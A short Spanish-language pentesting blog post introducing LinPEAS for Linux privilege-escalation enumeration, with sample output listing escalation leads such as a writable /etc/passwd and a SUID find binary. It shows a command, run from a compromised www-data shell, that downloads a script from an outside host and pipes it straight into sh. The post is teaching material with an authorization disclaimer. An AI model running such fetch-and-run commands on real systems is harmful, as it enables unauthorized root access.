~ / blog / pentesting
KALI

Enumeración con LinPEAS

Cuando entras a un Linux y no sabes por dónde escalar, no adivines: automatiza.

LinPEAS revisa cientos de vías de escalada de una sola pasada: permisos de sudo, binarios SUID, capabilities, tareas cron, contraseñas en archivos, configuraciones débiles, y más. Lo resalta todo por colores según qué tan explotable es.

El rojo con fondo amarillo es lo que casi seguro te da root. Es el primer comando que corre todo pentester al conseguir una shell.

# los comandos

www-data@victim:$ curl -L 10.0.0.50/linpeas.sh | sh | tee peas.txtcopiar
[+] Sudo version 1.8.31 (CVE candidate)
[+] SUID: /usr/bin/find
[95m[+] Writable /etc/passwd[0m
[+] Cron: /opt/scripts writable
www-data@victim:$ grep -A2 '99%' peas.txtcopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.